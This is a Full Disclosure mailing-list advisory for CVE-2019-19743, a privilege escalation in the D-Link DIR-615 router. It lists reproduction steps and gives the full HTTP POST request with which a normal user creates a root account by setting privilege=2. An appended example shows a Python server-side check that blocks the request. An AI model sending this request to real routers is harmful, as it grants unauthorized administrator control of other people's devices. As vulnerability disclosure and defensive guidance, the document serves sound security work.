Date: Mon, 16 Dec 2019 20:37:39 +0530
From: Sanyam Chawla <infosecsanyam@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] D-Link DIR-615 — Vertical Privilege Escalation

######################################################################################
# Exploit Title: D-Link DIR-615 — Vertical Privilege Escalation
# Date: 10.12.2019
# Exploit Author: Sanyam Chawla
# Vendor Homepage: http://www.dlink.co.in
# Category: Hardware (Wi-fi Router)
# Hardware Link: http://www.dlink.co.in/products/?pid=678
# Hardware Version: T1
# Firmware Version: 20.07
# Tested on: Windows 10 and Kali Linux
# CVE: CVE-2019-19743
#######################################################################################

Reproduction Steps:

1. Login to your wi-fi router gateway with normal user credentials [i.e: http://192.168.0.1]
2. Go to the Maintenance page and click on Admin on the left panel.
3. There is an option to create a user and by default, it shows only user accounts.
   <https://1.bp.blogspot.com/-f-MOwxhgrRI/XfUZSszN8TI/AAAAAAAAFb8/v2193GabEVYOO_Ax89FPrBymNTxXc32_wCLcBGAsYHQ/s1600/1.PNG>
4. Create an account with a name (i.e. ptguy) and change the privileges from user to root (admin) by changing the privilege id (1 to 2) with Burp Suite.

Privilege Escalation Post Request

POST /form2userconfig.cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 122
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/userconfig.htm
Cookie: SessionID=
Upgrade-Insecure-Requests: 1

username=ptguy&*privilege=2*&newpass=pentesting&confpass=pentesting&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=Send

5. Now log in with the newly created root (ptguy) user. You have all administrator rights.

Please let me know if any other information is required from my side for this vulnerability.

Best Regards,
Sanyam Chawla

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
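
Added example, not part of the original post and not D-Link's firmware code: a server-side authorization check that would reject the request in step 4, because the requested privilege is compared against the caller's own level taken from the session. It assumes the privilege ids given in the post (1 = user, 2 = root/admin); the function name, exception name and sample form values are hypothetical.

```python
from urllib.parse import parse_qs

# Privilege ids as described in the post: 1 = user, 2 = root (admin).
PRIV_USER, PRIV_ADMIN = 1, 2
VALID_PRIVILEGES = {PRIV_USER, PRIV_ADMIN}
REQUIRED_FIELDS = ("username", "privilege", "newpass", "confpass")


class Forbidden(Exception):
    """The add-user request must be refused (hypothetical name)."""


def authorize_add_user(session_privilege: int, body: str) -> dict:
    """Validate an urlencoded add-user body against the caller's privilege.

    session_privilege must come from server-side session state, never from
    anything the client sends. Returns the vetted account fields.
    """
    form = parse_qs(body, keep_blank_values=True)

    # Exactly one value per field: a repeated 'privilege' parameter must not
    # let a validator and the account store disagree on which one counts.
    for field in REQUIRED_FIELDS:
        if len(form.get(field, [])) != 1:
            raise Forbidden(f"missing or repeated field: {field}")

    try:
        requested = int(form["privilege"][0])
    except ValueError:
        raise Forbidden("privilege is not an integer") from None
    if requested not in VALID_PRIVILEGES:
        raise Forbidden("unknown privilege id")

    # The core check: nobody may create an account more privileged than
    # the session making the request. Hiding the option in the HTML form
    # is not a control, since the field is client-editable.
    if requested > session_privilege:
        raise Forbidden("cannot grant a privilege above your own")

    password = form["newpass"][0]
    if not password or password != form["confpass"][0]:
        raise Forbidden("empty or mismatched password")

    return {"username": form["username"][0], "privilege": requested}
```

Logging each `Forbidden` together with the session and source address gives the device owner a record of attempted escalations.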